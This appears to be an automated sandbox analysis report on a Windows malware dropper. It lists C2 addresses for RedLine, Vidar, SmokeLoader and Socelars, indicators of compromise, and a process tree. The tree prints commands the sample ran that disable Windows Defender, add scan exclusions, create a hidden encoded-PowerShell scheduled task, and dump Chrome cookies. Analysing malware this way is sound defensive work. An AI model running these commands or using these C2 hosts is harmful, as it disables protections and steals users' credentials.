Analysis
-
max time kernel
59s -
max time network
172s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
20/12/2021, 14:02
Static task
static1
Behavioral task
behavioral1
Sample
99194b593d58a4f74bd2ca7541f5d782db0d10fe7ec5fdeda5b5e8fe704394fa.exe
Resource
win7-en-20211208
Behavioral task
behavioral2
Sample
99194b593d58a4f74bd2ca7541f5d782db0d10fe7ec5fdeda5b5e8fe704394fa.exe
Resource
win10-en-20211208
General
-
Target
99194b593d58a4f74bd2ca7541f5d782db0d10fe7ec5fdeda5b5e8fe704394fa.exe
-
Size
7.0MB
-
MD5
27ee0fff858ebb65e9d645b3890418f9
-
SHA1
78cce78871932c34b30a16296063ee1ca6c152e5
-
SHA256
99194b593d58a4f74bd2ca7541f5d782db0d10fe7ec5fdeda5b5e8fe704394fa
-
SHA512
193f9dca9b3a7f26b7e0222d784e2f88f76743141c51917ba4dc4232ba1e2205b9fa53762c55926f53ea9c37670d121ab971e77ed0e33641db51ee355737ef05
Malware Config
Extracted
socelars
http://www.biohazardgraphics.com/
Extracted
vidar
49.1
915
https://noc.social/@sergeev46
https://c.im/@sergeev47
-
profile_id
915
Extracted
smokeloader
2020
http://rcacademy.at/upload/
http://e-lanpengeonline.com/upload/
http://vjcmvz.cn/upload/
http://galala.ru/upload/
http://witra.ru/upload/
Extracted
redline
v3user1
159.69.246.184:13127
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 1448 4824 rundll32.exe 130 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 5 IoCs
resource yara_rule behavioral2/memory/4288-319-0x0000000000800000-0x00000000009CF000-memory.dmp family_redline behavioral2/memory/4104-321-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral2/memory/4288-322-0x0000000000800000-0x00000000009CF000-memory.dmp family_redline behavioral2/memory/4116-328-0x000000000041933A-mapping.dmp family_redline behavioral2/memory/4104-326-0x0000000000419336-mapping.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 2 IoCs
resource yara_rule behavioral2/files/0x000500000001ab48-175.dat family_socelars behavioral2/files/0x000500000001ab48-216.dat family_socelars -
NirSoft WebBrowserPassView 2 IoCs
Password recovery tool for various web browsers
resource yara_rule behavioral2/files/0x000700000001ab4c-171.dat WebBrowserPassView behavioral2/files/0x000700000001ab4c-209.dat WebBrowserPassView -
Nirsoft 5 IoCs
resource yara_rule behavioral2/files/0x000700000001ab4c-171.dat Nirsoft behavioral2/files/0x000700000001ab4c-209.dat Nirsoft behavioral2/files/0x000500000001ab63-295.dat Nirsoft behavioral2/files/0x000500000001ab63-296.dat Nirsoft behavioral2/memory/1392-299-0x0000000000400000-0x0000000000455000-memory.dmp Nirsoft -
Vidar Stealer 3 IoCs
resource yara_rule behavioral2/memory/1256-272-0x00000000005C0000-0x000000000070A000-memory.dmp family_vidar behavioral2/memory/628-271-0x0000000002240000-0x0000000002319000-memory.dmp family_vidar behavioral2/memory/628-274-0x0000000000400000-0x0000000000535000-memory.dmp family_vidar -
resource yara_rule behavioral2/files/0x000600000001ab30-127.dat aspack_v212_v242 behavioral2/files/0x000600000001ab30-128.dat aspack_v212_v242 behavioral2/files/0x000600000001ab37-126.dat aspack_v212_v242 behavioral2/files/0x000600000001ab37-131.dat aspack_v212_v242 behavioral2/files/0x000600000001ab3a-132.dat aspack_v212_v242 behavioral2/files/0x000600000001ab3a-133.dat aspack_v212_v242 -
Downloads MZ/PE file
-
Executes dropped EXE 33 IoCs
pid Process 3036 setup_installer.exe 3956 setup_install.exe 2916 Sun1050791613c996ff.exe 3708 Sun108e4051ef0.exe 628 Sun10d73b7785b.exe 3700 Sun1074b86ebb831862.exe 1256 Sun10f1b87ddac.exe 1680 Sun10467c5b95.exe 1516 Sun10aa9ae1c57b995f.exe 2208 Sun1050791613c996ff.exe 3456 Sun10de08ca9cb.exe 2456 Sun10ee0af6c65e215a.exe 3488 Sun10fd677cdc.exe 2240 Sun10f51ad6615.exe 1608 Sun106a84a94b0.exe 2096 Sun10df2d13b8e171d6f.exe 1844 Sun1084932dd6b.exe 2424 Sun10fe8cb62035134.exe 3932 Sun1084932dd6b.exe 1208 Sun10fe8cb62035134.tmp 3304 Sun10fe8cb62035134.exe 1348 Sun10fe8cb62035134.tmp 1812 c0a2c849-5063-4935-ab6d-e64215a5a417.exe 1392 11111.exe 2932 d447a67e-39e8-4f6a-a12a-e9f5d8a8ff8d.exe 4288 f67369eb-64f2-4d2e-af91-189ade5f689a.exe 4308 windllhost.exe 4104 Sun10aa9ae1c57b995f.exe 4116 Sun10f51ad6615.exe 4416 99bc6450-4f49-4a6d-b27a-543ddf1db221.exe 4500 927c01de-e6a5-4887-8d30-8616657f8e14.exe 4656 11111.exe 4912 4742347347423473.exe -
Loads dropped DLL 11 IoCs
pid Process 3956 setup_install.exe 3956 setup_install.exe 3956 setup_install.exe 3956 setup_install.exe 3956 setup_install.exe 1208 Sun10fe8cb62035134.tmp 1348 Sun10fe8cb62035134.tmp 1064 rundll32.exe 1064 rundll32.exe 1268 rundll32.exe 1268 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-2361464256-2201551969-2316606395-1000\Software\Microsoft\Windows\CurrentVersion\Run\218457123 = "C:\\Users\\Admin\\AppData\\Roaming\\31062152\\4742347347423473.exe" d447a67e-39e8-4f6a-a12a-e9f5d8a8ff8d.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 23 ip-api.com 67 ipinfo.io 68 ipinfo.io 237 ipinfo.io 238 ipinfo.io -
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
pid Process 4288 f67369eb-64f2-4d2e-af91-189ade5f689a.exe 4416 99bc6450-4f49-4a6d-b27a-543ddf1db221.exe -
Suspicious use of SetThreadContext 3 IoCs
description pid Process procid_target PID 1844 set thread context of 3932 1844 Sun1084932dd6b.exe 112 PID 1516 set thread context of 4104 1516 Sun10aa9ae1c57b995f.exe 122 PID 2240 set thread context of 4116 2240 Sun10f51ad6615.exe 121 -
Drops file in Program Files directory 3 IoCs
description ioc Process File opened for modification C:\Program Files (x86)\FarLabUninstaller\unins000.dat Sun10fe8cb62035134.tmp File created C:\Program Files (x86)\FarLabUninstaller\unins000.dat Sun10fe8cb62035134.tmp File created C:\Program Files (x86)\FarLabUninstaller\is-UMT7L.tmp Sun10fe8cb62035134.tmp -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Sun10f1b87ddac.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Sun10f1b87ddac.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI Sun10f1b87ddac.exe -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2196 schtasks.exe 6200 schtasks.exe 6192 schtasks.exe -
Kills process with taskkill 5 IoCs
pid Process 4348 taskkill.exe 4396 taskkill.exe 4752 taskkill.exe 4948 taskkill.exe 2284 taskkill.exe -
Script User-Agent 1 IoCs
Uses user-agent string associated with script host/environment.
description flow ioc HTTP User-Agent header 21 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 1256 Sun10f1b87ddac.exe 1256 Sun10f1b87ddac.exe 1056 powershell.exe 988 powershell.exe 988 powershell.exe 3056 Process not Found 3056 Process not Found 3056 Process not Found 3056 Process not Found 3056 Process not Found 3056 Process not Found 3056 Process not Found 3056 Process not Found 3056 Process not Found 3056 Process not Found 3056 Process not Found 3056 Process not Found 3056 Process not Found 3056 Process not Found 3056 Process not Found 3056 Process not Found 3056 Process not Found 3056 Process not Found 3056 Process not Found 3056 Process not Found 3056 Process not Found 3056 Process not Found 3056 Process not Found 3056 Process not Found 3056 Process not Found 3056 Process not Found 3056 Process not Found 3056 Process not Found 3056 Process not Found 3056 Process not Found 3056 Process not Found 3056 Process not Found 3056 Process not Found 3056 Process not Found 3056 Process not Found 3056 Process not Found 3056 Process not Found 3056 Process not Found 3056 Process not Found 3056 Process not Found 3056 Process not Found 3056 Process not Found 3056 Process not Found 3056 Process not Found 3056 Process not Found 3056 Process not Found 3056 Process not Found 3056 Process not Found 3056 Process not Found 3056 Process not Found 3056 Process not Found 3056 Process not Found 3056 Process not Found 3056 Process not Found 3056 Process not Found 3056 Process not Found 3056 Process not Found 3056 Process not Found 3056 Process not Found -
Suspicious behavior: MapViewOfSection 1 IoCs
pid Process 1256 Sun10f1b87ddac.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 3708 Sun108e4051ef0.exe Token: SeCreateTokenPrivilege 2096 Sun10df2d13b8e171d6f.exe Token: SeAssignPrimaryTokenPrivilege 2096 Sun10df2d13b8e171d6f.exe Token: SeLockMemoryPrivilege 2096 Sun10df2d13b8e171d6f.exe Token: SeIncreaseQuotaPrivilege 2096 Sun10df2d13b8e171d6f.exe Token: SeMachineAccountPrivilege 2096 Sun10df2d13b8e171d6f.exe Token: SeTcbPrivilege 2096 Sun10df2d13b8e171d6f.exe Token: SeSecurityPrivilege 2096 Sun10df2d13b8e171d6f.exe Token: SeTakeOwnershipPrivilege 2096 Sun10df2d13b8e171d6f.exe Token: SeLoadDriverPrivilege 2096 Sun10df2d13b8e171d6f.exe Token: SeSystemProfilePrivilege 2096 Sun10df2d13b8e171d6f.exe Token: SeSystemtimePrivilege 2096 Sun10df2d13b8e171d6f.exe Token: SeProfSingleProcessPrivilege 2096 Sun10df2d13b8e171d6f.exe Token: SeIncBasePriorityPrivilege 2096 Sun10df2d13b8e171d6f.exe Token: SeCreatePagefilePrivilege 2096 Sun10df2d13b8e171d6f.exe Token: SeCreatePermanentPrivilege 2096 Sun10df2d13b8e171d6f.exe Token: SeBackupPrivilege 2096 Sun10df2d13b8e171d6f.exe Token: SeRestorePrivilege 2096 Sun10df2d13b8e171d6f.exe Token: SeShutdownPrivilege 2096 Sun10df2d13b8e171d6f.exe Token: SeDebugPrivilege 2096 Sun10df2d13b8e171d6f.exe Token: SeAuditPrivilege 2096 Sun10df2d13b8e171d6f.exe Token: SeSystemEnvironmentPrivilege 2096 Sun10df2d13b8e171d6f.exe Token: SeChangeNotifyPrivilege 2096 Sun10df2d13b8e171d6f.exe Token: SeRemoteShutdownPrivilege 2096 Sun10df2d13b8e171d6f.exe Token: SeUndockPrivilege 2096 Sun10df2d13b8e171d6f.exe Token: SeSyncAgentPrivilege 2096 Sun10df2d13b8e171d6f.exe Token: SeEnableDelegationPrivilege 2096 Sun10df2d13b8e171d6f.exe Token: SeManageVolumePrivilege 2096 Sun10df2d13b8e171d6f.exe Token: SeImpersonatePrivilege 2096 Sun10df2d13b8e171d6f.exe Token: SeCreateGlobalPrivilege 2096 Sun10df2d13b8e171d6f.exe Token: 31 2096 Sun10df2d13b8e171d6f.exe Token: 32 2096 Sun10df2d13b8e171d6f.exe Token: 33 2096 Sun10df2d13b8e171d6f.exe Token: 34 2096 Sun10df2d13b8e171d6f.exe Token: 35 2096 Sun10df2d13b8e171d6f.exe Token: SeDebugPrivilege 1516 Sun10aa9ae1c57b995f.exe Token: SeDebugPrivilege 2240 Sun10f51ad6615.exe Token: SeDebugPrivilege 1608 Sun106a84a94b0.exe Token: SeDebugPrivilege 988 powershell.exe Token: SeDebugPrivilege 1056 powershell.exe Token: SeShutdownPrivilege 3056 Process not Found Token: SeCreatePagefilePrivilege 3056 Process not Found Token: SeShutdownPrivilege 3056 Process not Found Token: SeCreatePagefilePrivilege 3056 Process not Found Token: SeShutdownPrivilege 3056 Process not Found Token: SeCreatePagefilePrivilege 3056 Process not Found Token: SeShutdownPrivilege 3056 Process not Found Token: SeCreatePagefilePrivilege 3056 Process not Found Token: SeShutdownPrivilege 3056 Process not Found Token: SeCreatePagefilePrivilege 3056 Process not Found Token: SeShutdownPrivilege 3056 Process not Found Token: SeCreatePagefilePrivilege 3056 Process not Found Token: SeShutdownPrivilege 3056 Process not Found Token: SeCreatePagefilePrivilege 3056 Process not Found Token: SeShutdownPrivilege 3056 Process not Found Token: SeCreatePagefilePrivilege 3056 Process not Found Token: SeShutdownPrivilege 3056 Process not Found Token: SeCreatePagefilePrivilege 3056 Process not Found Token: SeShutdownPrivilege 3056 Process not Found Token: SeCreatePagefilePrivilege 3056 Process not Found Token: SeShutdownPrivilege 3056 Process not Found Token: SeCreatePagefilePrivilege 3056 Process not Found Token: SeShutdownPrivilege 3056 Process not Found Token: SeCreatePagefilePrivilege 3056 Process not Found -
Suspicious use of FindShellTrayWindow 1 IoCs
pid Process 1348 Sun10fe8cb62035134.tmp -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2720 wrote to memory of 3036 2720 99194b593d58a4f74bd2ca7541f5d782db0d10fe7ec5fdeda5b5e8fe704394fa.exe 69 PID 2720 wrote to memory of 3036 2720 99194b593d58a4f74bd2ca7541f5d782db0d10fe7ec5fdeda5b5e8fe704394fa.exe 69 PID 2720 wrote to memory of 3036 2720 99194b593d58a4f74bd2ca7541f5d782db0d10fe7ec5fdeda5b5e8fe704394fa.exe 69 PID 3036 wrote to memory of 3956 3036 setup_installer.exe 70 PID 3036 wrote to memory of 3956 3036 setup_installer.exe 70 PID 3036 wrote to memory of 3956 3036 setup_installer.exe 70 PID 3956 wrote to memory of 1304 3956 setup_install.exe 73 PID 3956 wrote to memory of 1304 3956 setup_install.exe 73 PID 3956 wrote to memory of 1304 3956 setup_install.exe 73 PID 3956 wrote to memory of 3964 3956 setup_install.exe 74 PID 3956 wrote to memory of 3964 3956 setup_install.exe 74 PID 3956 wrote to memory of 3964 3956 setup_install.exe 74 PID 3956 wrote to memory of 448 3956 setup_install.exe 75 PID 3956 wrote to memory of 448 3956 setup_install.exe 75 PID 3956 wrote to memory of 448 3956 setup_install.exe 75 PID 3956 wrote to memory of 784 3956 setup_install.exe 76 PID 3956 wrote to memory of 784 3956 setup_install.exe 76 PID 3956 wrote to memory of 784 3956 setup_install.exe 76 PID 3956 wrote to memory of 1712 3956 setup_install.exe 77 PID 3956 wrote to memory of 1712 3956 setup_install.exe 77 PID 3956 wrote to memory of 1712 3956 setup_install.exe 77 PID 3956 wrote to memory of 4080 3956 setup_install.exe 81 PID 3956 wrote to memory of 4080 3956 setup_install.exe 81 PID 3956 wrote to memory of 4080 3956 setup_install.exe 81 PID 3956 wrote to memory of 2876 3956 setup_install.exe 78 PID 3956 wrote to memory of 2876 3956 setup_install.exe 78 PID 3956 wrote to memory of 2876 3956 setup_install.exe 78 PID 4080 wrote to memory of 2916 4080 cmd.exe 79 PID 4080 wrote to memory of 2916 4080 cmd.exe 79 PID 4080 wrote to memory of 2916 4080 cmd.exe 79 PID 784 wrote to memory of 3708 784 cmd.exe 80 PID 784 wrote to memory of 3708 784 cmd.exe 80 PID 3956 wrote to memory of 3376 3956 setup_install.exe 82 PID 3956 wrote to memory of 3376 3956 setup_install.exe 82 PID 3956 wrote to memory of 3376 3956 setup_install.exe 82 PID 1304 wrote to memory of 1056 1304 cmd.exe 98 PID 1304 wrote to memory of 1056 1304 cmd.exe 98 PID 1304 wrote to memory of 1056 1304 cmd.exe 98 PID 1712 wrote to memory of 628 1712 cmd.exe 83 PID 1712 wrote to memory of 628 1712 cmd.exe 83 PID 1712 wrote to memory of 628 1712 cmd.exe 83 PID 3964 wrote to memory of 988 3964 cmd.exe 97 PID 3964 wrote to memory of 988 3964 cmd.exe 97 PID 3964 wrote to memory of 988 3964 cmd.exe 97 PID 3956 wrote to memory of 1440 3956 setup_install.exe 96 PID 3956 wrote to memory of 1440 3956 setup_install.exe 96 PID 3956 wrote to memory of 1440 3956 setup_install.exe 96 PID 3956 wrote to memory of 1268 3956 setup_install.exe 95 PID 3956 wrote to memory of 1268 3956 setup_install.exe 95 PID 3956 wrote to memory of 1268 3956 setup_install.exe 95 PID 3956 wrote to memory of 1088 3956 setup_install.exe 84 PID 3956 wrote to memory of 1088 3956 setup_install.exe 84 PID 3956 wrote to memory of 1088 3956 setup_install.exe 84 PID 3956 wrote to memory of 1332 3956 setup_install.exe 94 PID 3956 wrote to memory of 1332 3956 setup_install.exe 94 PID 3956 wrote to memory of 1332 3956 setup_install.exe 94 PID 2876 wrote to memory of 3700 2876 cmd.exe 93 PID 2876 wrote to memory of 3700 2876 cmd.exe 93 PID 2876 wrote to memory of 3700 2876 cmd.exe 93 PID 1268 wrote to memory of 1256 1268 cmd.exe 92 PID 1268 wrote to memory of 1256 1268 cmd.exe 92 PID 1268 wrote to memory of 1256 1268 cmd.exe 92 PID 3956 wrote to memory of 2364 3956 setup_install.exe 85 PID 3956 wrote to memory of 2364 3956 setup_install.exe 85
Processes
-
C:\Users\Admin\AppData\Local\Temp\99194b593d58a4f74bd2ca7541f5d782db0d10fe7ec5fdeda5b5e8fe704394fa.exe"C:\Users\Admin\AppData\Local\Temp\99194b593d58a4f74bd2ca7541f5d782db0d10fe7ec5fdeda5b5e8fe704394fa.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2720 -
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3036 -
C:\Users\Admin\AppData\Local\Temp\7zSCDB5A586\setup_install.exe"C:\Users\Admin\AppData\Local\Temp\7zSCDB5A586\setup_install.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:3956 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable4⤵
- Suspicious use of WriteProcessMemory
PID:1304 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1056
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"4⤵
- Suspicious use of WriteProcessMemory
PID:3964 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:988
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sun10467c5b95.exe4⤵PID:448
-
C:\Users\Admin\AppData\Local\Temp\7zSCDB5A586\Sun10467c5b95.exeSun10467c5b95.exe5⤵
- Executes dropped EXE
PID:1680 -
C:\Users\Admin\Pictures\Adobe Films\EXSNwvbiYOmfXKGKgs3Ku6Pi.exe"C:\Users\Admin\Pictures\Adobe Films\EXSNwvbiYOmfXKGKgs3Ku6Pi.exe"6⤵PID:4800
-
-
C:\Users\Admin\Pictures\Adobe Films\q5I2dJJV6kK7x8RRCnHC1M9e.exe"C:\Users\Admin\Pictures\Adobe Films\q5I2dJJV6kK7x8RRCnHC1M9e.exe"6⤵PID:2368
-
-
C:\Users\Admin\Pictures\Adobe Films\0OppErD0bsEo_NalHxGugaq5.exe"C:\Users\Admin\Pictures\Adobe Films\0OppErD0bsEo_NalHxGugaq5.exe"6⤵PID:2800
-
C:\Users\Admin\AppData\Local\a876bd7a-f3c2-453b-86cd-ac22b22e468e.exe"C:\Users\Admin\AppData\Local\a876bd7a-f3c2-453b-86cd-ac22b22e468e.exe"7⤵PID:5224
-
-
C:\Users\Admin\AppData\Local\8f4f023a-1e19-4b03-8c88-6390a95e1642.exe"C:\Users\Admin\AppData\Local\8f4f023a-1e19-4b03-8c88-6390a95e1642.exe"7⤵PID:2144
-
-
C:\Users\Admin\AppData\Local\5c6c344d-d780-416b-bc74-d1aa11f14a27.exe"C:\Users\Admin\AppData\Local\5c6c344d-d780-416b-bc74-d1aa11f14a27.exe"7⤵PID:4336
-
-
-
C:\Users\Admin\Pictures\Adobe Films\PnthudFnJxDTaFR6hCSUQSRL.exe"C:\Users\Admin\Pictures\Adobe Films\PnthudFnJxDTaFR6hCSUQSRL.exe"6⤵PID:1864
-
C:\Users\Admin\AppData\Local\Temp\OneCleanerInst813932.exe"C:\Users\Admin\AppData\Local\Temp\OneCleanerInst813932.exe"7⤵PID:5500
-
-
C:\Users\Admin\AppData\Local\Temp\zhangting.exe"C:\Users\Admin\AppData\Local\Temp\zhangting.exe"7⤵PID:5516
-
C:\Users\Admin\AppData\Local\Temp\zhangting.exe"C:\Users\Admin\AppData\Local\Temp\zhangting.exe" -u8⤵PID:3988
-
-
-
C:\Users\Admin\AppData\Local\Temp\Proxyupd.exe"C:\Users\Admin\AppData\Local\Temp\Proxyupd.exe"7⤵PID:4852
-
-
C:\Users\Admin\AppData\Local\Temp\inst.exe"C:\Users\Admin\AppData\Local\Temp\inst.exe"7⤵PID:4352
-
-
C:\Users\Admin\AppData\Local\Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\setup.exe"7⤵PID:4452
-
-
C:\Users\Admin\AppData\Local\Temp\setup1.exe"C:\Users\Admin\AppData\Local\Temp\setup1.exe"7⤵PID:4612
-
-
C:\Users\Admin\AppData\Local\Temp\racoon.exe"C:\Users\Admin\AppData\Local\Temp\racoon.exe"7⤵PID:4928
-
-
C:\Users\Admin\AppData\Local\Temp\askhelp.exe"C:\Users\Admin\AppData\Local\Temp\askhelp.exe"7⤵PID:4340
-
-
C:\Users\Admin\AppData\Local\Temp\chrome update.exe"C:\Users\Admin\AppData\Local\Temp\chrome update.exe"7⤵PID:5820
-
-
C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"C:\Users\Admin\AppData\Local\Temp\Calculator Installation.exe"7⤵PID:4652
-
-
C:\Users\Admin\AppData\Local\Temp\logger.exe"C:\Users\Admin\AppData\Local\Temp\logger.exe"7⤵PID:3936
-
-
C:\Users\Admin\AppData\Local\Temp\chrome.exe"C:\Users\Admin\AppData\Local\Temp\chrome.exe"7⤵PID:1588
-
-
C:\Users\Admin\AppData\Local\Temp\chrome1.exe"C:\Users\Admin\AppData\Local\Temp\chrome1.exe"7⤵PID:6024
-
-
C:\Users\Admin\AppData\Local\Temp\chrome2.exe"C:\Users\Admin\AppData\Local\Temp\chrome2.exe"7⤵PID:5280
-
-
-
C:\Users\Admin\Pictures\Adobe Films\jzRNmT8ActwBJx4V0KWBqBSU.exe"C:\Users\Admin\Pictures\Adobe Films\jzRNmT8ActwBJx4V0KWBqBSU.exe"6⤵PID:5192
-
C:\Users\Admin\Pictures\Adobe Films\jzRNmT8ActwBJx4V0KWBqBSU.exe"C:\Users\Admin\Pictures\Adobe Films\jzRNmT8ActwBJx4V0KWBqBSU.exe"7⤵PID:5388
-
-
-
C:\Users\Admin\Pictures\Adobe Films\4ePcItbOIFBNfJJYafOyxx5O.exe"C:\Users\Admin\Pictures\Adobe Films\4ePcItbOIFBNfJJYafOyxx5O.exe"6⤵PID:5176
-
C:\Users\Admin\AppData\Local\Temp\7zSB107.tmp\Install.exe.\Install.exe7⤵PID:3840
-
C:\Users\Admin\AppData\Local\Temp\7zSD326.tmp\Install.exe.\Install.exe /S /site_id "525403"8⤵PID:5792
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737010 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737007 ThreatIDDefaultAction_Actions=6 Force=True" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147737394 ThreatIDDefaultAction_Actions=6 Force=True" &9⤵PID:5076
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True"10⤵PID:1152
-
C:\Windows\SysWOW64\cmd.exe/C powershell WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ThreatIDDefaultAction_Ids=2147735503 ThreatIDDefaultAction_Actions=6 Force=True11⤵PID:5456
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"9⤵PID:2412
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&10⤵PID:4456
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"9⤵PID:4636
-
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&10⤵PID:5864
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gYpzmTZDv" /SC once /ST 00:56:19 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="9⤵
- Creates scheduled task(s)
PID:2196
-
-
-
-
-
C:\Users\Admin\Pictures\Adobe Films\lvvsSK9BoV7bBxpQm39J8vYU.exe"C:\Users\Admin\Pictures\Adobe Films\lvvsSK9BoV7bBxpQm39J8vYU.exe"6⤵PID:5356
-
C:\Users\Admin\Pictures\Adobe Films\lvvsSK9BoV7bBxpQm39J8vYU.exe"C:\Users\Admin\Pictures\Adobe Films\lvvsSK9BoV7bBxpQm39J8vYU.exe"7⤵PID:4404
-
-
-
C:\Users\Admin\Pictures\Adobe Films\0pLeABNB_2OGcWGTckrKLPxb.exe"C:\Users\Admin\Pictures\Adobe Films\0pLeABNB_2OGcWGTckrKLPxb.exe"6⤵PID:5492
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt7⤵PID:5684
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /stab C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt7⤵PID:3664
-
-
-
